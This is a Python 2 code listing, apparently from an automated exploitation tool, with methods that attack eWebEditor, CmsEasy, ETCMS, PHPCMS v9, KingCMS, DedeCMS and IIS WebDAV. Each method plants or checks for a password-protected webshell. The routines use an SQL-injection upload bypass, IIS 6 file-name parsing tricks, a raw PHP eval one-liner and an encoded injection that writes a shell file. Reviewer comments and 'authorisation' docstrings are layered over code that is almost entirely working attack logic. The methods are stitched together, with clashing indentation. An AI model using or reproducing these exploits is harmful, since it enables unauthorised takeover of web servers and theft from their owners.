    def ewebeditor_asp(self, arg):  # eWebEditor (ASP build) upload-extension check
        """Probe an eWebEditor ASP install for an upload-extension bypass.

        The `style` parameter of Upload.asp is sent with a UNION SELECT that
        re-reads the 'standard' style row but concatenates `|cer` onto
        S_ImageExt (`%2b` is `+`), so the posted `long.asp.cer` passes the
        image-extension check. The saved file name is read back from the
        `parent.UploadSaved('...')` callback in the response and the resulting
        URL is handed to the project helper `yijuhua_cs`.

        Args:
            arg: target base URL; "/jms/edit/..." is appended verbatim, so a
                 trailing slash on `arg` would produce a double slash.

        Returns:
            None on the normal path (the result list is pushed onto
            Class_Queue.exp_url); 0 if any exception escapes.

        Intrusive: this writes a file to the target host. Run only with
        explicit authorisation.
        """
        try:
            url = arg + "/jms/edit/Upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a"
            # NOTE(review): the file handle is never closed and the POST has no
            # timeout, so an unresponsive target blocks this worker indefinitely.
            files = {'uploadfile': open("long.asp.cer", "rb")}
            r = requests.post(url, files=files)
            data = r.text
            #print data
            # Unescaped '.' in "parent.UploadSaved" matches any character; harmless here.
            p = re.compile(r"parent.UploadSaved\('(.*?)'\)")
            sarr = p.findall(data)  # first match is used below
            # NOTE(review): IndexError when the callback is absent; it is
            # swallowed by the broad except below and reported as 0.
            name = sarr[0]
            #print name
            url = "%s/jms/edit/uploadfile/%s" % (arg, name)
            # Project helper (not shown): presumably checks that the one-liner
            # shell at `url` answers to the password "long" -- confirm.
            if yijuhua_CS.yijuhua_cs("asp", url,
                                     "long"):  # (asp|php), shell URL, password
                #print url+"OK"
                EXP_list = [
                    1, self.url, "exp", "exp_ewebeditor_Upload_asp", url,
                    "long", "webshell"
                ]
                # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                Class_Queue.exp_url.put(EXP_list, 0.5)  # push onto the result queue
            else:
                #print url+"NO"
                EXP_list = [
                    0, self.url, "exp", "exp_ewebeditor_Upload_asp", url,
                    "long", "webshell"
                ]
                # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                Class_Queue.exp_url.put(EXP_list, 0.5)  # push onto the result queue

        # NOTE(review): `except Exception, e` is Python 2 only syntax. Every
        # failure (DNS, connection refused, regex miss) is silently mapped to 0,
        # so a network outage is indistinguishable from "not vulnerable".
        except Exception, e:
            #print e
            return 0
    def scan(self, arg):
        """Post `long.php;.jpg` to the celive doajaxfileupload.php endpoint.

        The response is scanned for the first `<a href='...'>` link; if that
        link still contains `.php;.jpg` (i.e. the server kept the original
        name instead of renaming it -- presumably relying on the IIS 6 `;`
        file-name parsing quirk, confirm), the URL is passed to `yijuhua_cs`
        and a result row is queued on `url_exp`.

        Args:
            arg: target base URL; "/celive/live/doajaxfileupload.php" is
                 appended verbatim.

        Returns:
            None in every case; exceptions are printed and discarded.

        Intrusive: this uploads a file to the target host. Run only with
        explicit authorisation.
        """
        try:
            # UPLOAD.MultipartPostHandler is a project helper (not shown) that
            # presumably encodes `params` as multipart/form-data for urllib2.
            opener = urllib2.build_opener(UPLOAD.MultipartPostHandler)
            # NOTE(review): the file handle is never closed; no timeout is set
            # on the request.
            params = {"fileToUpload": open("long.php;.jpg", "rb")}
            url = arg + '/celive/live/doajaxfileupload.php'
            req = opener.open(url, params)
            html = req.read()
            murl = re.compile("<a href='(.*?)'")
            ok = murl.findall(html)
            print ok  # debug output to stdout (Python 2 print statement)
            if ok and '.php;.jpg' in ok[0]:
                # Project helper (not shown): presumably checks that the shell
                # at ok[0] answers to the password "long" -- confirm.
                if yijuhua_cs("php", ok[0], "long"):  # (asp|php), shell URL, password
                    # verified
                    EXP_list = [
                        1, self.url, "exp", "CN_exp_etcms_Upload_shell", ok[0],
                        "long", "webshell"
                    ]
                    # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                    print EXP_list
                    url_exp.put(EXP_list, 0.5)  # push onto the result queue
                else:
                    # not verified
                    EXP_list = [
                        0, self.url, "exp", "CN_exp_etcms_Upload_shell", ok[0],
                        "long", "webshell"
                    ]
                    # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                    print EXP_list
                    url_exp.put(EXP_list, 0.5)  # push onto the result queue
#                print "exp_kingcms_getshell---%s---%s"%(ok[0],"webshell--pass:long")
        # NOTE(review): Python 2 only syntax; all errors are printed and then
        # dropped, so the caller cannot tell a network failure from a miss.
        except Exception, e:
            print e
            pass
    def find(self, arg):
        """Check whether /plus/dst.php on a DedeCMS host answers as a shell.

        Unlike the other methods in this listing, `arg` is a bare host[:port]
        (it is passed straight to httplib.HTTPConnection and later formatted
        into 'http://%s/plus/dst.php').

        Args:
            arg: host or host:port of the target, without scheme.

        Returns:
            None on the normal path (result pushed onto Class_Queue.exp_url);
            False if an exception is raised inside the try block.
        """
        site = '/plus/dst.php'
        heareds = {
            "User-Agent":
            "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
        }
        # NOTE(review): constructed outside the try, so a malformed host:port
        # (e.g. non-numeric port) raises out of this method uncaught. No
        # timeout is set and the connection is never closed.
        conn = httplib.HTTPConnection(arg)
        try:
            conn.request('GET', site, None, heareds)
            httpres = conn.getresponse()
            # NOTE(review): a 200 alone is a weak signal -- catch-all/soft-404
            # pages also return 200; the real check is yijuhua_cs below.
            if httpres.status == 200:
                data = 'http://%s/plus/dst.php' % arg
                # Project helper (not shown): presumably checks that the shell
                # at `data` answers to the password "cmd" -- confirm.
                if yijuhua_CS.yijuhua_cs("php", data,
                                         "cmd"):  # (asp|php), shell URL, password
                    # verified
                    EXP_list = [
                        1, self.url, "exp", "exp_dedecms_yijuhua", data, "cmd",
                        "webshell"
                    ]
                    # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                    Class_Queue.exp_url.put(EXP_list, 0.5)  # push onto the result queue
                else:
                    # not verified
                    EXP_list = [
                        0, self.url, "exp", "exp_dedecms_yijuhua", data, "cmd",
                        "webshell"
                    ]
                    # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                    Class_Queue.exp_url.put(EXP_list, 0.5)  # push onto the result queue
#                print "exp_dedecms_yijuhua---%s---%s"%(data,"webshell--pass:cmd")
        # NOTE(review): Python 2 only syntax; every error is mapped to False.
        except Exception, e:
            #print e
            return False
    def getshell(self,arg):
        """PHPCMS v9 `crop_upload` check: POST a PHP one-liner as the body.

        The request targets index.php?m=attachment&c=attachments&a=crop_upload
        with a `file=` parameter built from `self.url1` and a name ending in
        `.Php.JPG` followed by encoded spaces and `Php`. The response is
        searched for an `http://....Php.JPG` URL, which is then rebuilt with
        the same encoded suffix and handed to `yijuhua_cs`.

        Args:
            arg: target URL containing '//'; only the part after '//' is used
                 as the HTTP host (an `arg` without '//' raises IndexError,
                 which the broad except turns into 0).

        Returns:
            1 whenever the try block completes -- regardless of whether a
            shell was found (the result itself goes to `url_exp`); 0 on any
            exception.

        Intrusive: this attempts to write a file on the target host. Run only
        with explicit authorisation.
        """
        try:
            headers = {'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}
            #data = "test<?php @eval($_POST[\''.'shaoxiao'.'\']);?>'"
            data="<?php @eval($_POST['long']);?>"  # PHP one-liner sent as the raw POST body
            url = arg.split('//')[1]
            site = '/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file='+self.url1+'/uploadfile/1222.thumb_.Php.JPG%20%20%20%20%20%20%20Php'
            # NOTE(review): no timeout; the connection is never closed.
            conn = httplib.HTTPConnection(url)
            conn.request('POST',site,data,headers)
            httpres = conn.getresponse()
            html = httpres.read()
            #print html
            if httpres.status == 200 and html:
                # NOTE(review): not a raw string -- '\.' and '\s' survive only
                # because they are unknown escapes; use r'...' to be safe.
                gets = re.compile('http://(.*?)\.Php\.JPG\s')
                get = gets.findall(html)
                if get:
                    data='http://'+get[0]+'.Php.JPG%20%20%20%20%20%20%20Php'          # shell URL; password "long"
                    # Project helper (not shown): presumably checks that the
                    # shell at `data` answers to the password "long" -- confirm.
                    if yijuhua_cs("php",data,"long"):   # (asp|php), shell URL, password
                    # verified
                        EXP_list=[1,self.url0,self.url1,"CN_exp_phpcmsv9_getshell",data,"long","webshell"]
                        # [confidence 0/1, main URL, sub URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list,0.5)   # push onto the result queue

                    else:
                    # not verified
                        EXP_list=[0,self.url0,self.url1,"CN_exp_phpcmsv9_getshell",data,"long","webshell"]
                        # [confidence 0/1, main URL, sub URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list,0.5)   # push onto the result queue
                    #print "exp_phpcmsv9_getshell---%s---%s"%(data,"webshell--pass:long")
            # NOTE(review): reached on 200-with-no-match and on non-200 alike,
            # so the return value does not mean "shell obtained".
            return 1
        # NOTE(review): Python 2 only syntax; every error is mapped to 0.
        except Exception,e:
            #print e
            return 0
 def scan(self, arg):
     """KingCMS search.php injection check that expects /Style.php to appear.

     A percent-encoded `query=` payload is sent to /search.php. The first
     check is reflection of the marker `shaoxiao` (the decoded prefix of the
     payload); the follow-up fetch of /Style.php and the '111222' marker test
     imply the payload is meant to write that file -- decode the literal to
     confirm before relying on this description.

     Args:
         arg: target base URL; "/search.php?..." and "/Style.php" are
              appended verbatim.

     Returns:
         None on the normal path (result pushed onto `url_exp`); 0 if an
         exception is raised.

     Intrusive: this attempts to create a file on the target host. Run only
     with explicit authorisation.

     NOTE(review): this method is indented with 1/5 spaces, unlike the
     4/8-space methods around it; it only parses if its enclosing class
     uses the same indent.
     """
     url = arg+'/search.php?query=shaoxiao%27%3B%3F%3E%3C%3F%66%70%75%74%73%28%66%6F%70%65%6E%28%27%53' \
               '%74%79%6C%65%2E%70%68%70%27%2C%27%77%27%29%2C%62%61%73%65%36%34%5F%64%65%63%6F%64%65%28%' \
               '27%4D%54%45%78%50%44%39%77%61%48%41%67%51%47%56%32%59%57%77%6F%4A%46%39%51%54%31%4E%55%57' \
               '%79%64%6A%62%57%51%6E%58%53%6B%37%50%7A%34%79%4D%6A%49%3D%27%29%29%3B%3F%3E%26%6D%6F%64%65%' \
               '6C%69%64%3D%31%20%6F%72%20%32%3D%32'
     # The payload above is percent-encoded (URL-decode to read it).
     shellurl = arg + '/Style.php'
     try:
         # NOTE(review): no timeout on either urlopen call.
         html = urllib2.urlopen(url).read()
         #print html
         if 'shaoxiao' in html:
             shellhtml = urllib2.urlopen(shellurl).read()
             if '111222' in shellhtml:
                 # Project helper (not shown): presumably checks that the shell
                 # at `shellurl` answers to the password "cmd" -- confirm.
                 if yijuhua_cs("php", shellurl,
                               "cmd"):  # (asp|php), shell URL, password
                     # verified
                     EXP_list = [
                         1, self.url, "exp", "CN_exp_kingcms_getshell",
                         shellurl, "cmd", "webshell"
                     ]
                     # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                     url_exp.put(EXP_list, 0.5)  # push onto the result queue
                 else:
                     # not verified
                     EXP_list = [
                         0, self.url, "exp", "CN_exp_kingcms_getshell",
                         shellurl, "cmd", "webshell"
                     ]
                     # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                     url_exp.put(EXP_list, 0.5)  # push onto the result queue
                 #print "exp_kingcms_getshell---%s---%s"%(shellurl,"webshell--pass:cmd")
     # NOTE(review): Python 2 only syntax; every error is mapped to 0.
     except Exception, e:
         #print e
         return 0
    def three(self,arg,path):
        """Verify a previously planted DedeCMS /plus/long.php by status diff.

        Requests `path + '/plus/long.php'` and a deliberately bogus long
        file name in the same directory via the project helper
        `self.request`. If both responses exist and their status codes
        differ, the real file is assumed present (this guards against
        catch-all pages that return the same status for everything) and the
        URL is handed to `yijuhua_cs`.

        Args:
            arg: host/base URL given to `self.request` and prefixed to `site`.
            path: web path prefix under which /plus/ lives.

        Returns:
            0 in every case; results are reported only via `url_exp`.
        """
        try:
            site = path+'/plus/long.php'
            testsite = path+'/plus/shaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhao.php'
            # self.request (not shown) presumably returns a response object
            # with .status, or a falsy value on failure -- confirm.
            httpres = self.request(arg,site)
            code = None
            testcode = None
            testhttpres = self.request(arg,testsite)
            if testhttpres:
                testcode = testhttpres.status  # status of the bogus-name request
            if httpres:
                code = httpres.status # status of the real request
                # NOTE(review): if the bogus request failed, testcode is None and
                # any real status counts as "different" -- a false positive path.
                if code != testcode: # differing status codes => file considered present
                    #print u' \nGood,write OK ! Shell :%s%s  pass:long' % (arg,site)
                    # NOTE(review): yijuhua_cs gets the unstripped `arg`, while the
                    # queued URL uses arg.strip(); they diverge if `arg` has
                    # surrounding whitespace.
                    if yijuhua_cs("php",arg+site,"long"):   # (asp|php), shell URL, password
                    # verified
                        EXP_list=[1,self.url0,self.url1,"CN_exp_dedecms_getshell",arg.strip()+site,"long","webshell"]
                        # [confidence 0/1, main URL, sub URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list,0.5)   # push onto the result queue
                    else:
                    # not verified
                        EXP_list=[0,self.url0,self.url1,"CN_exp_dedecms_getshell",arg.strip()+site,"long","webshell"]
                        # [confidence 0/1, main URL, sub URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list,0.5)   # push onto the result queue

#                    print "exp_dedecms_getshell---%s---%s"%(arg.strip()+site,"webshell--pass:guige")
                else:
                    #print u' \n亲,你点真背,不存在漏洞!'
                    return 0
            return 0
        # NOTE(review): Python 2 only syntax; every error is mapped to 0.
        except Exception,e:
            #print e
            return 0
    def IIS_webdav(self, url, port=80):  # IIS WebDAV PUT/MOVE write check
        """Detect WebDAV on an IIS host and try a PUT followed by a MOVE.

        Sends a raw HTTP OPTIONS request over a socket and looks for the
        substring 'DAV' in the first 1024 bytes of the reply. If found, the
        project helper `self.put` writes `self.txt`; on success a result row
        is queued, then `self.move` renames it to a random name ending in
        `.asp;jpg` and the new URL is handed to `yijuhua_cs`.

        Args:
            url: host name (resolved with gethostbyname and used as the Host
                 header and URL host).
            port: TCP port, default 80.

        Returns:
            0 in every case; results are reported only via `url_exp`.

        Intrusive: this writes and renames files on the target host. Run
        only with explicit authorisation.
        """
        try:
            self.txt = '/test.txt'
            # NOTE(review): the socket is never closed and has no timeout.
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            remote_ip = socket.gethostbyname(url)
            s.connect((remote_ip, port))
            message = "OPTIONS / HTTP/1.1\r\nHost: %s\r\n\r\n" % url
            s.sendall(message)
            reply = s.recv(1024)
            # Substring test, not a header parse: it matches a "DAV:" header
            # but also any other occurrence of 'DAV' in the first 1024 bytes.
            if 'DAV' in reply:
                #print 'Webdav Is Vulnerable! Try To Hacking....'
                # self.put (not shown) presumably issues the WebDAV PUT -- confirm.
                if self.put(url, self.txt):
                    # NOTE(review): self.txt already starts with '/', so this
                    # yields "http://host//test.txt" (double slash).
                    data = "http://%s/%s" % (url, self.txt)
                    #print "exp_IISwebdav_put---%s---%s"%(data,"webshell--pass:long")
                    EXP_list = [
                        1, url, "exp", "exp_IISwebdav_put", data, "", ""
                    ]
                    # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                    url_exp.put(EXP_list, 0.5)  # push onto the result queue

                    MOVE_asp = self.sjzf()  # random file name (project helper, not shown)
                    MOVE_asp += ".asp;jpg"
                    moveheaders = {
                        'User-Agent':
                        'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
                        'Destination': 'http://%s/%s' % (url.strip(), MOVE_asp)
                    }
                    # self.move (not shown) presumably issues the WebDAV MOVE -- confirm.
                    if self.move(url, self.txt, moveheaders):
                        data = "http://%s/%s" % (url.strip(), MOVE_asp)
                        # Project helper (not shown): presumably checks that the
                        # shell at `data` answers to the password "long" -- confirm.
                        if yijuhua_cs("asp", data,
                                      "long"):  # (asp|php), shell URL, password
                            # verified
                            EXP_list = [
                                1, url, "exp", "exp_IISwebdav_move", data,
                                "long", "webshell"
                            ]
                            # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                            #print EXP_list
                            url_exp.put(EXP_list, 0.5)  # push onto the result queue
                        else:
                            # not verified
                            # NOTE(review): vuln-type tag differs from the success
                            # branch ("UAS_exp_IISwebdav_move" vs "exp_IISwebdav_move");
                            # downstream consumers grouping by tag will split these.
                            EXP_list = [
                                0, url, "exp", "UAS_exp_IISwebdav_move", data,
                                "long", "webshell"
                            ]
                            # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                            #print EXP_list
                            url_exp.put(EXP_list, 0.5)  # push onto the result queue

#                        print "exp_IISwebdav_move---%s---%s"%(data,"webshell--pass:long")
#else:
#    print 'Webdav Is No Vulnerable!'
            return 0
        # NOTE(review): Python 2 only syntax; every error is mapped to 0.
        except Exception, e:
            #print e
            return 0
    def scan(self, arg):
        """CmsEasy celive upload check (two-URL variant).

        Unpacks `arg` into (url0, url1), asks the project helper
        `self.URL_DZ` whether the upload endpoint accepts 'jpg', queues a
        row for that alone, then posts `long.php;.jpg` and extracts the
        stored file name from the first `target=...>NAME</a>` link. If the
        file is reachable under /celive/uploadfiles/ (checked via
        `self.http_get`), the URL is handed to `yijuhua_cs`.

        Args:
            arg: 2-tuple (url0, url1); url1 must contain '//' because
                 `url1.split('//')[1]` is used as the host.

        Returns:
            None on the normal path (rows pushed onto `url_exp`); 0 if the
            file-name regex finds nothing or any exception escapes.

        Intrusive: this uploads a file to the target host. Run only with
        explicit authorisation.
        """
        try:
            url0, url1 = arg
            #http://www.skyscom.com/celive/live/doajaxfileupload.php
            data = "%s/celive/live/doajaxfileupload.php" % (url1)
            # self.URL_DZ (not shown) must return something 'jpg' can be tested
            # against -- presumably the allowed upload extensions; confirm.
            if 'jpg' in self.URL_DZ(data):  # does the endpoint accept jpg?
                # NOTE(review): reported with confidence 1 here, but the sibling
                # cmseasy_IIS6_jx method reports the same condition with 0.
                EXP_list = [
                    1, url0, url1, "CN_exp_cmseasy_IIS6_jx_JPG", data, "", ""
                ]
                # [confidence 0/1, main URL, sub URL, vuln type, vuln URL, password, note] -- 7 fields
                url_exp.put(EXP_list, 0.5)  # push onto the result queue
                # upload the file
                #data="<?php @eval($_POST['long']);?>"  # one-liner
                # NOTE(review): file handle never closed; no timeout on the POST.
                files = {'fileToUpload': open('long.php;.jpg', 'rb')}
                r = requests.post(data, files=files)
                data = r.text

                name = []
                try:
                    p = re.compile(r'target=.+?>(.*?)</a>'
                                   )  # e.g. [u'CELIVE-Q7duV0tNj8.php;.jpg']
                    sarr = p.findall(data)  # first match is used
                    name = sarr[0]
                # NOTE(review): bare except also hides KeyboardInterrupt/SystemExit.
                except:
                    #print "!"
                    return 0
                #print name
                data = "%s/celive/uploadfiles/%s" % (url1, name)
                # self.http_get (not shown) presumably checks the path exists -- confirm.
                if self.http_get(
                        url1.split('//')[1],
                        "/celive/uploadfiles/" + name):  # does the uploaded file exist?
                    # Project helper (not shown): presumably checks that the shell
                    # at `data` answers to the password "long" -- confirm.
                    if yijuhua_cs("php", data, "long"):  # (asp|php), shell URL, password
                        # verified
                        EXP_list = [
                            1, url0, url1, "CN_exp_cmseasy_IIS6_jx", data,
                            "long", "webshell"
                        ]
                        # [confidence 0/1, main URL, sub URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list, 0.5)  # push onto the result queue
                    else:
                        # not verified
                        EXP_list = [
                            0, url0, url1, "CN_exp_cmseasy_IIS6_jx", data,
                            "long", "webshell"
                        ]
                        # [confidence 0/1, main URL, sub URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list, 0.5)  # push onto the result queue

        # NOTE(review): Python 2 only syntax; every error is mapped to 0.
        except Exception, e:
            #print e
            return 0
    def cmseasy_IIS6_jx(self, url):  # CmsEasy file upload + IIS 6 file-name parsing
        """CmsEasy celive upload check (single-URL variant).

        Asks the project helper `self.URL_DZ` whether the upload endpoint
        accepts 'jpg', queues a row for that alone, then posts
        `long.php;.jpg` and extracts the stored file name from the first
        `target=...>NAME</a>` link. If the file is reachable under
        /celive/uploadfiles/ (checked via `self.http_get`), the URL is
        handed to `yijuhua_cs`.

        Args:
            url: target base URL. `url[7:]` is used as the host, i.e. the
                 code assumes exactly an "http://" prefix; an "https://" URL
                 yields a wrong host.

        Returns:
            None on the normal path (rows pushed onto `url_exp`); 0 if the
            file-name regex finds nothing or any exception escapes.

        Intrusive: this uploads a file to the target host. Run only with
        explicit authorisation.
        """
        try:
            #http://www.skyscom.com/celive/live/doajaxfileupload.php
            data = "%s/celive/live/doajaxfileupload.php" % (url)
            # self.URL_DZ (not shown) must return something 'jpg' can be tested
            # against -- presumably the allowed upload extensions; confirm.
            if 'jpg' in self.URL_DZ(data):  # does the endpoint accept jpg?
                #print "-cms-cmseasy_IIS6_jx-open jpg %s"%(data)
                # NOTE(review): reported with confidence 0 here, but the sibling
                # scan() method reports the same condition with 1.
                EXP_list = [0, url, "exp", "exp_cmseasy_IIS6_jx", data, "", ""]
                # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                url_exp.put(EXP_list, 0.5)  # push onto the result queue
                # upload the file
                #data="<?php @eval($_POST['long']);?>"  # one-liner
                # NOTE(review): file handle never closed; no timeout on the POST.
                files = {'fileToUpload': open('long.php;.jpg', 'rb')}
                r = requests.post(data, files=files)
                data = r.text

                name = []
                try:
                    p = re.compile(r'target=.+?>(.*?)</a>'
                                   )  # e.g. [u'CELIVE-Q7duV0tNj8.php;.jpg']
                    sarr = p.findall(data)  # first match is used
                    name = sarr[0]
                # NOTE(review): bare except also hides KeyboardInterrupt/SystemExit.
                except:
                    #print "!"
                    return 0
                #print name
                data = "%s/celive/uploadfiles/%s" % (url, name)
                # self.http_get (not shown) presumably checks the path exists -- confirm.
                if self.http_get(url[7:],
                                 "/celive/uploadfiles/" + name):  # does the uploaded file exist?
                    # Project helper (not shown): presumably checks that the shell
                    # at `data` answers to the password "long" -- confirm.
                    if yijuhua_cs("php", data, "long"):  # (asp|php), shell URL, password
                        # verified
                        EXP_list = [
                            1, url, "exp", "CN_exp_cmseasy_IIS6_jx", data,
                            "long", "webshell"
                        ]
                        # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                        url_exp.put(EXP_list, 0.5)  # push onto the result queue
                    else:
                        # not verified
                        EXP_list = [
                            0, url, "exp", "CN_exp_cmseasy_IIS6_jx", data,
                            "long", "webshell"
                        ]
                        # [shell verified 0/1, site, severity, vuln type, vuln URL, password, note] -- 7 fields
                        url_exp.put(EXP_list, 0.5)  # push onto the result queue

        # NOTE(review): Python 2 only syntax; every error is mapped to 0.
        except Exception, e:
            #print e
            return 0